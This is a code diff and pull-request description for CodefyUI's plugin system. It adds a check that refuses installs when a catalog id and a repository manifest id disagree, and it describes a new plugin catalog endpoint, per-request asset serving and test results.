+    # makes an unchanged request into growth worth warning about. The CLI
+    # deliberately collapses them with ``or None``: every caller here passes
+    # a list, an empty one arrives from an install that recorded nothing as
+    # readily as from an update that granted nothing, and treating that as an
+    # empty GRANT would print "this is more than last time" for a first
+    # install. Keeping today's output is the reason; a route with a real
+    # lockfile behind it can pass the distinction through.
     prior = normalize_capabilities(getattr(args, "prior_capabilities", None))
     decision = core_consent.decide_capabilities(requested, prior=prior or None)
     if not decision.missing:
@@ -1445,11 +1450,13 @@ def cmd_uninstall(args: argparse.Namespace) -> int:
         # The files are still there, so the plugin would load again on the
         # next start: nothing was uninstalled, and saying otherwise would be
         # a lie the lockfile then tells forever. Windows holding a file open
-        # is the usual cause.
-        plugin_dir = plugins_user_root() / plugin_id
+        # is the usual cause. The path comes back with the outcome rather
+        # than being rebuilt here from the id -- where a pack's files live is
+        # the lifecycle module's rule, and a second copy of it would print
+        # the wrong directory the day the rule changes.
         err(
             f"刪除失敗：{outcome.error}",
-            f"Failed to remove {plugin_dir}: {outcome.error}",
+            f"Failed to remove {outcome.directory}: {outcome.error}",
         )
         return 1
 

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -870,10 +870,13 @@ def _install_github(
 
     *catalog_id* is the catalog row this install came from, when it came from
     one; it is recorded in the lockfile so a later reader can tell the
-    catalog's own pack from free text that happens to carry the same id.
-    Keyword-only and last so the five positional arguments stay what they
-    were -- ``scripts/project.py`` restores a project's pins through this
-    function positionally.
+    catalog's own pack from free text that happens to carry the same id. It
+    is also checked against the manifest that arrives -- a row whose
+    repository declares a different id is describing one pack and fetching
+    another -- and the install is refused when they disagree. Keyword-only
+    and last so the five positional arguments stay what they were --
+    ``scripts/project.py`` restores a project's pins through this function
+    positionally.
     """
     url = f"https://github.com/{owner}/{repo}"
     info(f"來源：{url}", f"Source: {url}")
@@ -933,6 +936,27 @@ def _install_github(
             err(str(e), str(e))
             return 1
 
+        plugin_id = manifest["plugin"]["id"]
+
+        # The catalog said this row installs `catalog_id`; the repository's
+        # own manifest says which id it installs under. When those disagree
+        # the catalog is describing one pack and fetching another, and every
+        # card, lockfile key and /api/plugins/<id> URL after this point would
+        # use the manifest's id while the user was reading the catalog's.
+        # Refused here, before anything is staged or written -- the temp
+        # directory goes with the `with` block, like the other early
+        # refusals. A row that has drifted is a bug in the catalog, and one
+        # naming both ids is what gets it fixed.
+        if catalog_id is not None and plugin_id != catalog_id:
+            err(
+                f"目錄項目 {catalog_id} 指向的儲存庫宣告的 id 是 {plugin_id}，"
+                f"兩者不一致，已中止安裝。",
+                f"The catalog lists this pack as '{catalog_id}', but the "
+                f"repository it names declares id '{plugin_id}'. Nothing was "
+                f"installed.",
+            )
+            return 1
+
         if _manifest_has_frontend(manifest):
             warn(
                 "此外掛包含前端 UI 程式碼（JavaScript），安裝後將在您的瀏覽器中"
@@ -942,7 +966,6 @@ def _install_github(
                 " Only install plugins you trust.",
             )
 
-        plugin_id = manifest["plugin"]["id"]
         allowed = manifest.get("security", {}).get("allowed_modules") or []
         try:
             core_consent.check_trust(allowed, trust_author=args.trust_author)

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -754,14 +754,13 @@ def _install_catalog(plugin_id: str, args, lockfile) -> int:
 def _reserved_id_refusal(
     plugin_id: str, owner: str, repo: str
 ) -> tuple[str, str] | None:
-    """The bilingual refusal for an id ``{owner}/{repo}`` may not install
-    under, or ``None`` when it may.
+    """The bilingual refusal for an id ``owner/repo`` may not use, else ``None``.
 
-    Three ids are refused, and the third is the one worth spelling out. An id
-    is taken if it names a route under ``/api/plugins/`` (the router, not the
-    plugin, would decide which one answers) or a pack that ships with
-    CodefyUI (the built-in directory would decide). A ``github`` catalog id
-    is different: that row IS a repository, so refusing it outright would
+    Three kinds of id are refused, and the third is the one worth spelling
+    out. An id is taken if it names a route under ``/api/plugins/`` (the
+    router, not the plugin, would decide which one answers) or a pack that
+    ships with CodefyUI (the built-in directory would decide). A ``github``
+    catalog id is different: that row IS a repository, so refusing it would
     make the official pack the catalog advertises the one thing nobody can
     install. So it is refused only for a DIFFERENT repository -- the id is
     what the lockfile, the catalog card and the route all key on, and a fork


### PR DESCRIPTION
> 中文摘要：這是「外掛中心」計畫的第一個後端 PR。把 `cdui plugin` 指令列的純邏輯搬進新的 `backend/app/core/plugins/` 套件（指令列變成薄薄的一層前端，輸出與行為不變）、把套件中心的背景工作執行器抽成共用的 `app.core.jobs`、新增 `GET /api/plugins/catalog`（可安裝與已安裝的外掛一次列出）、把三個官方 GitHub 外掛（graph-copilot、self-learning、official-template）加進目錄可用名稱安裝、外掛的 `assets/` 改成每次請求即時提供（原本的啟動時掛載在正式安裝下永遠被 SPA 的 catch-all 擋住）。下一個 PR 才會加上安裝／檢視 API 與工作事件串流。

## What / Why

The backend half of the Plugin Center groundwork (P-B1 of the approved Plugin Center + Source Control wave). Today a
plugin can only be installed from a terminal, and the GUI's Custom & Plugins tab tells the user so. This PR makes the
server able to answer "what could I install, what is installed, and what would installing this do" from the same code
the CLI uses, without changing what the CLI does.

No user-visible behaviour change except three additions:

- `GET /api/plugins/catalog` — installable and installed plugins in one listing (statuses `installed / disabled /
  available / removed / installing / missing_files`; `official` is a claim about provenance — the catalog row plus the
  recorded `catalog_id` or the catalog's own repository — never about the id alone; node names for available built-in
  packs; `python_deps`, `has_frontend`, `consent_required`), plus six extra fields on `GET /api/plugins`.
- Three official GitHub plugins in `plugins/registry.json` (`graph-copilot`, `self-learning`, `official-template`),
  installable by catalog name (`cdui plugin install graph-copilot`), listed by `search` and `info`; `cdui plugin sync`
  never proposes them. A github catalog id is reserved to the repository the catalog names: the official author can
  still install their own pack, a fork cannot take its place, and `link` / `new` allow the id locally for the dev loop.
- Plugin `assets/` are served per request at the same URL (`/plugins/<id>/assets/<file>`, GET + HEAD, enabled plugins
  only, traversal-checked, `Cache-Control: no-cache`). The startup `StaticFiles` mounts were registered in the lifespan,
  after the import-time SPA catch-all, so in a built install a pack's assets answered `index.html`; a pack installed
  while the server runs now serves them too.

How:

- `backend/app/core/jobs.py`: the Package Center's job runner (one job at a time, event ring buffer, cursor + long poll,
  cancel, bounded shutdown) extracted; `PackService` delegates. The packs suite is untouched and green.
- `backend/app/core/plugins/` (`errors manifest sources catalog gate github deps consent inspect reload lifecycle
  listing`): the CLI's pure logic, moved verbatim where it could be (the AST gate and dependency vetting are
  byte-identical) with structured exceptions instead of bilingual `ValueError` text. `scripts/plugins.py` keeps every
  name it exported and its output; the reserved-id rule has one owner (`catalog.reserved_id_holder`) used by the CLI
  and by `inspect_github`. `reload.rediscover_now()` replaces five duplicated `rediscover_all(...)` calls;
  `lifecycle.set_enabled` / `uninstall_plugin` are shared by the CLI and the routes; `inspect.py` is the source
  inspection the next PR's `POST /api/plugins/inspect` exposes.
- `core/auth.py::bound_to_loopback()` is shared by the pack guard and the new `CODEFYUI_ALLOW_REMOTE_PLUGIN_INSTALL`
  setting (defined and tested; attached to the install routes in the next PR). `CODEFYUI_GITHUB_TOKEN`, when set, is
  sent on GitHub API calls. `plugin_loader.save_lockfile` writes atomically.

What I deliberately did not do: no install / uninstall / update routes yet (next PR); the CLI still runs
`uv pip install` for plugin deps the way it did (the constraints freeze arrives with the shared install flow); the
Plugin Center UI is a separate PR; the CLI/server lockfile read-modify-write race stays a follow-up (`installed.json.lock`).

## Closes / relates to

Part of the Plugin Center + Source Control wave (no issue number; the wave plan is the authority). Stays open:
install / inspect / job routes, the UI, and the docs page for the panel.

## Test evidence

```
cd backend && .venv\Scripts\python.exe -m pytest -q -p no:cacheprovider tests
  -> 6647 passed, 26 skipped, 17 warnings   (main at 115b628: 6393 passed, 26 skipped, 17 warnings; +254 tests, same warnings)
uvx ruff check .                            -> All checks passed!
python scripts/check_control_bytes.py       -> OK: no raw C0 control bytes in 1314 tracked files
grep for conflict markers in CHANGELOG.md   -> 0 lines
```

Process: every task was implemented by a fresh subagent, task-reviewed (spec + quality) with fix rounds where needed,
then the whole branch got three area reviews (infrastructure / core package / CLI + docs) and one fix wave with a
scoped re-review; the packs tests, `conftest.py` and every pre-existing CLI assertion are unchanged except the one
heading the reviewers asked to reword (`test_parse_source_bare_name_error_is_localized`).

## Checklist

- [x] Commits are signed off (`git commit -s`) per CONTRIBUTING.md's DCO section (43 of 43).
- [x] If I changed a docs page or a node-param description, I updated its zh-TW twin in the same PR
      (`docs/docs/advanced/plugins.md` and its zh-TW mirror: the three packs, the `official-template` catalog name,
      the assets wording).
- [x] No pictographic emoji in code, logs, UI strings, or this PR body.
- [x] I explained what I deliberately did not do, if a reviewer might expect it.
